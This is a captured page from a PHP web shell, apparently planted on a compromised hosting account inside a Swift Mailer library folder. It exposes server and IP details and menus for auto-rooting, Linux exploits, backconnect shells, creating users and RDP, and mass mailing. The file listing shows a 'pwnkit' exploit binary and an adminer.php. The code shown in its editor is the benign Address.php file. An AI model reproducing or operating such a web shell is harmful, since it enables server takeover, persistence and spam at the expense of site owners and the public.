Linux webm004.cluster102.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.102.20.4 | : 216.73.216.15
Cant Read [ /etc/named.conf ]
5.4.45
opusyn1t
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
opusyn1t /
www /
boutique /
tools /
swift /
Swift /
[ HOME SHELL ]
Name
Size
Permission
Action
Authenticator
[ DIR ]
drwx---r-x
Cache
[ DIR ]
drwx---r-x
Connection
[ DIR ]
drwx---r-x
Events
[ DIR ]
drwx---r-x
Iterator
[ DIR ]
drwx---r-x
Log
[ DIR ]
drwx---r-x
Message
[ DIR ]
drwx---r-x
Plugin
[ DIR ]
drwx---r-x
.mad-root
0
B
-rw-r--r--
Address.php
2.12
KB
-rw----r--
AddressContainer.php
183
B
-rw----r--
Authenticator.php
877
B
-rw----r--
BadResponseException.php
549
B
-rw----r--
BatchMailer.php
5.91
KB
-rw----r--
Cache.php
1.5
KB
-rw----r--
CacheFactory.php
1.06
KB
-rw----r--
ClassLoader.php
910
B
-rw----r--
Connection.php
2.21
KB
-rw----r--
ConnectionBase.php
2.73
KB
-rw----r--
ConnectionException.php
519
B
-rw----r--
Events.php
831
B
-rw----r--
Exception.php
892
B
-rw----r--
File.php
4.42
KB
-rw----r--
FileException.php
479
B
-rw----r--
Iterator.php
993
B
-rw----r--
Log.php
3.18
KB
-rw----r--
LogContainer.php
966
B
-rw----r--
Message.php
25.8
KB
-rw----r--
RecipientList.php
5.58
KB
-rw----r--
adminer.php
465.43
KB
-rw-r--r--
autoload_classmap.php
0
B
-r--r--r--
index.php
1.24
KB
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Address.php
<?php /** * Swift Mailer Address Container (purely for rigid RFC conformance) * Please read the LICENSE file * @copyright Chris Corbyn <chris@w3style.co.uk> * @author Chris Corbyn <chris@w3style.co.uk> * @package Swift * @license GNU Lesser General Public License */ require_once dirname(__FILE__) . "/ClassLoader.php"; Swift_ClassLoader::load("Swift_AddressContainer"); /** * Swift_Address is just a lone e-mail address reprsented as an object * @package Swift * @author Chris Corbyn <chris@w3style.co.uk> */ class Swift_Address extends Swift_AddressContainer { /** * The e-mail address portion * @var string */ protected $address = null; /** * The personal name part * @var string */ protected $name = null; /** * Constructor * @param string The address portion * @param string The personal name, optional */ public function __construct($address, $name=null) { $this->setAddress($address); if ($name !== null) $this->setName($name); } /** * Set the email address * @param string */ public function setAddress($address) { $this->address = trim((string)$address); } /** * Get the address portion * @return string */ public function getAddress() { return $this->address; } /** * Set the personal name * @param string */ public function setName($name) { if ($name !== null) $this->name = (string) $name; else $this->name = null; } /** * Get personal name portion * @return string */ public function getName() { return $this->name; } /** * Build the address the way it should be structured * @param boolean If the string will be sent to a SMTP server as an envelope * @return string */ public function build($smtp=false) { if ($smtp) { return "<" . $this->address . ">"; } else { if (($this->name !== null)) { return $this->name . " <" . $this->address . ">"; } else return $this->address; } } /** * PHP's casting conversion * @return string */ public function __toString() { return $this->build(true); } }
Close